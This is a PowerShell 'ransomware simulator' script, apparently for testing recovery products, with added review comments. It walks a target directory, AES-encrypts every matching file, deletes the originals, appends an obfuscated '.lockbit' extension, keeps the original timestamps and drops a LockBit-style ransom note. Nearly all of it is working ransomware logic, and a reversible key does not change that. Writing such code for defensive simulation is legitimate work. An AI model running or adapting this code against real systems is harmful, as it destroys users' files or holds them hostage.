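<#
.SYNOPSIS
Release: Beaux Ransomware Simulator that leverages AES symmetrical encryption to target specified file types based on defined starting path and all sub-directories. e.g. c:\fileshares

.DESCRIPTION
This powershell script encrypts or decrypts files using a symmetrical key using AES encryption

.EXAMPLE
.\RanSimV2.ps1 -e "C:\Files"
To decrypt encrypted files:
.\RanSimV2.ps1 -d "C:\Files"

.PARAMETER Target File Path
Specify the root directory that will be targeted along with sub-directories for file encryption. Example c:\fileshares

.PARAMETER FilesTypes
This parameter is mandatory, but can be adjusted to which file types to encrypt. Wildcards are supported for files such as *.doc* which will encrypt .doc and .docx.
Office : Will generate files with the following extensions: "*.pptx","*.docx","*.doc","*.xls","*.rft","*.txt",".pdf","*.ppt","*.dot"
Multimedia : Will create random files with the following extensions : "*.avi","*.midi","*.mov","*.mp3","*.mp4","*.mpeg","*.mpeg2","*.mpeg3","*.mpg","*.ogg"

.PARAMETER File Extension
This parameter is mandatory and defines what the encrypted files will be appended with once attacked. Example .encrypted

.PARAMETER Encryption key
This parameter is mandatory and is the plain-text AES encryption key used for both encryption and decryption. A pre-defined key is provided. A new key can be generated and replaced in the global variables.

.NOTES
The script will encrypt or decrypt from the file target path and all sub-directories below. Encryption extension will be appended to encrypted files. You can choose which file types by extension will be encrypted in the global variables.
// David Siles - dsiles@rubrik.com
Simulate a LockBit attack and stage a ransom note
#>

# NOTE(review): the help block above describes parameters this script does not actually
# expose. The only command-line inputs are the mode switch and the target directory; the
# file-type pattern ($TargetFiles), the appended extension ($x0r) and the key ($Key) are
# set in the script body below.

#User Variables
# Positional arguments: $args[0] is the mode switch (-e, -d or -h), $args[1] the root
# directory to walk. Both are validated before any crypto object is created.
$Mode = $args[0]
$Directory = $args[1]
# Where CreateReadme writes the simulated ransom note and where DecryptFiles removes it from.
$RansomNoteLocation = "C:\Users\Public\Desktop\Restore-My-Files.txt"
# Plain-text passphrase; Main derives the 256-bit AES key from it with SHA-256.
$Key = "V2VUaGVCZXN0"
# Name pattern handed to Get-ChildItem -include when selecting files to encrypt.
$TargetFiles = '*.*'

# Help
# NOTE(review): the usage text names PSRansom.ps1 while the help header names RanSimV2.ps1.
function Show-Help {
    Write-host ; Write-Host " Info: " -ForegroundColor Yellow -NoNewLine ; Write-Host " This tool helps you simulate encryption process of Ransomaware"
    Write-Host ; Write-Host " Usage: " -ForegroundColor Yellow -NoNewLine ; Write-Host ".\PSRansom.ps1 -e Directory" -ForegroundColor Blue
    Write-Host ; Write-Host " .\PSRansom.ps1 -d Directory" -ForegroundColor Blue
    Write-Host " Decrypt target files" -ForegroundColor Green
    Write-Host " " -NoNewLine ; Write-Host
}

# Errors
# Argument validation. The script exits (non-zero on error) instead of using a top-level
# 'break', which would otherwise propagate into a caller's loop.
if ($args[0] -like "-h*") {
    Show-Help
    exit 0
}
if ($null -eq $args[0]) {
    Show-Help
    Write-Host "[!] Not enough parameters!" -ForegroundColor Red
    exit 1
}
# Only the two documented modes are accepted; previously any unrecognised switch fell
# through to the encryption branch.
if ($Mode -ne "-e" -and $Mode -ne "-d") {
    Show-Help
    Write-Host "[!] Unknown mode '$Mode'. Use -e or -d" -ForegroundColor Red
    exit 1
}
# Refuse to run without an existing target directory: Get-ChildItem with an empty path
# would otherwise walk the current working directory. -Path (not -LiteralPath) keeps the
# wildcard paths Get-ChildItem accepts working.
if (-not $Directory -or -not (Test-Path -Path $Directory -PathType Container)) {
    Show-Help
    Write-Host "[!] Target directory not found: '$Directory'" -ForegroundColor Red
    exit 1
}

#######################################
# Encrypts or decrypts a single file using the script-scoped $aesManaged instance.
# Arguments:
#   -Mode  "Encrypt" or "Decrypt"
#   -Key   accepted for the call signature but not used here; the AES key is set on
#          $aesManaged in Main
#   -Path  file to process
# Outputs: the path of the file written; nothing when -Path does not resolve.
# Encrypt writes <Path>$x0r with the 16-byte IV prepended to the ciphertext and copies
# the original LastWriteTime onto it. Decrypt reads the IV back from the first 16 bytes
# and writes <Path> with $x0r stripped. Neither branch deletes its input file.
#######################################
function Invoke-AESEncryption {
    [CmdletBinding()]
    [OutputType([string])]
    Param(
        [Parameter(Mandatory = $true)]
        [ValidateSet("Encrypt", "Decrypt")]
        [String]$Mode,
        [Parameter(Mandatory = $true)]
        [String]$Key,
        [Parameter(Mandatory = $true, ParameterSetName = "CryptFile")]
        [String]$Path
    )
    Begin { }
    Process {
        switch ($Mode) {
            "Encrypt" {
                $File = Get-Item -Path $Path -ErrorAction SilentlyContinue
                # 'break' leaves the switch without emitting a path, so the caller skips deletion.
                if (!$File.FullName) { break }
                $plainBytes = [System.IO.File]::ReadAllBytes($File.FullName)
                $lastWrite = $File.LastWriteTime
                $encryptor = $aesManaged.CreateEncryptor()
                $encryptedBytes = $encryptor.TransformFinalBlock($plainBytes, 0, $plainBytes.Length)
                # IV first, ciphertext after; Decrypt relies on this layout.
                $encryptedBytes = $aesManaged.IV + $encryptedBytes
                $outPath = $File.FullName + $x0r
                $outPath
                [System.IO.File]::WriteAllBytes($outPath, $encryptedBytes)
                # Preserve the original timestamp on the encrypted copy.
                (Get-Item -Path $outPath).LastWriteTime = $lastWrite
            }
            "Decrypt" {
                $File = Get-Item -Path $Path -ErrorAction SilentlyContinue
                if (!$File.FullName) { break }
                $cipherBytes = [System.IO.File]::ReadAllBytes($File.FullName)
                $outPath = $File.FullName.replace($x0r,"")
                # First 16 bytes are the IV written by the Encrypt branch.
                $aesManaged.IV = $cipherBytes[0..15]
                $decryptor = $aesManaged.CreateDecryptor()
                $decryptedBytes = $decryptor.TransformFinalBlock($cipherBytes, 16, $cipherBytes.Length - 16)
                $outPath
                [System.IO.File]::WriteAllBytes($outPath, $decryptedBytes)
                (Get-Item -Path $outPath).LastWriteTime = $File.LastWriteTime
            }
        }
    }
    End { }
}

#######################################
# Writes the simulated ransom note to $RansomNoteLocation (overwrites an existing file).
# The note text is a fixed string with placeholder ('#') links.
#######################################
function CreateReadme {
    $RansomNote = "All your important files are encrypted!`nAny attempts to restore your files with the thrid-party software will be fatal for your files!`nRESTORE YOU DATA POSIBLE ONLY BUYING private key from us.`nThere is only one way to get your files back:`n`n1) Through a standard browser(FireFox, Chrome, Edge, Opera)`n| 1. Open link ########################################`n| 2. Follow the instructions on this page`n`n2) Through a Tor Browser - recommended`n| 1. Download Tor browser - ######################################## and install it.`n| 2. Open link in TOR browser - ########################################`n This link only works in Tor Browser!`n| 3. Follow the instructions on this page`n`n`n ### Attention! ###`n # lockbit-decryptor.### may be blocked. We recommend using a Tor browser to access the site`n # Do not rename encrypted files.`n # Do not try to decrypt using third party software, it may cause permanent data loss.`n # Decryption of your files with the help of third parties may cause increased price(they add their fee to our).`n # Tor Browser may be blocked in your country or corporate network. Use ######################################## or use Tor Browser over VPN.`n # Tor Browser user manual ########################################"
    $RansomNote | Out-File -FilePath "$RansomNoteLocation"
}

#######################################
# Walks $Directory recursively and encrypts every file matching $TargetFiles, skipping
# directories, files already carrying the $x0r extension, readme.txt and the ransom note.
# The original is deleted only after the encrypted copy is confirmed on disk, so a read
# or write failure no longer leaves the file missing on both sides.
#######################################
function EncryptFiles {
    $noteName = Split-Path -Path $RansomNoteLocation -Leaf
    foreach ($i in $(Get-ChildItem $Directory -recurse -include $TargetFiles -exclude *$x0r, readme.txt, $noteName | Where-Object { (! $_.PSIsContainer) } | ForEach-Object { $_.FullName })) {
        Write-Host "[e] Encrypting $i :" -ForegroundColor Red
        $outPath = $null
        try {
            $outPath = Invoke-AESEncryption -Mode Encrypt -Key $Key -Path $i -ErrorAction Stop
        } catch {
            Write-Host "[!] Failed to encrypt $i : $_" -ForegroundColor Red
            continue
        }
        if ($outPath -and (Test-Path -LiteralPath $outPath)) { Remove-Item $i }
    }
}

#######################################
# Walks $Directory recursively, decrypts every *$x0r file, removes the encrypted copy once
# the plaintext is confirmed on disk, then removes the ransom note (silently if absent).
#######################################
function DecryptFiles {
    foreach ($i in $(Get-ChildItem $Directory -recurse -filter *$x0r | Where-Object {( ! $_.PSIsContainer )} | ForEach-Object { $_.FullName })) {
        Write-Host "[d] Decrypting $i :" -ForegroundColor Green
        $outPath = $null
        try {
            $outPath = Invoke-AESEncryption -Mode Decrypt -Key $Key -Path $i -ErrorAction Stop
        } catch {
            Write-Host "[!] Failed to decrypt $i : $_" -ForegroundColor Red
            continue
        }
        if ($outPath -and (Test-Path -LiteralPath $outPath)) { Remove-Item $i }
    }
    Remove-Item "$RansomNoteLocation" -ErrorAction SilentlyContinue
}

#Main
# Extension appended to encrypted files; the base64 literal decodes to ".lockbit".
$x0r = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("LmxvY2tiaXQ="))
# One AES-256-CBC/PKCS7 instance shared by every file in this run; its key is SHA-256($Key).
$shaManaged = New-Object System.Security.Cryptography.SHA256Managed
$aesManaged = New-Object System.Security.Cryptography.AesManaged
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
$aesManaged.Key = $shaManaged.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Key))

# Mode was validated above, so anything other than -d is -e.
if ($Mode -eq "-d") {
    Write-Host ; Write-Host "[!] Decrypting $Directory directory.." -ForegroundColor Green
    DecryptFiles
    Write-Host "[i] Decrypted all files.." -ForegroundColor Green
    Start-Sleep 1
} else {
    Write-Host ; Write-Host "[!] Simulating encryption on $Directory directory.." -ForegroundColor Green
    Write-Host "[!] Encrypting all files.." -ForegroundColor Red
    CreateReadme
    EncryptFiles
}
$shaManaged.dispose()
$aesManaged.dispose()
Start-Sleep 1
Write-Host "[i] Done!" -ForegroundColor Green
Write-Host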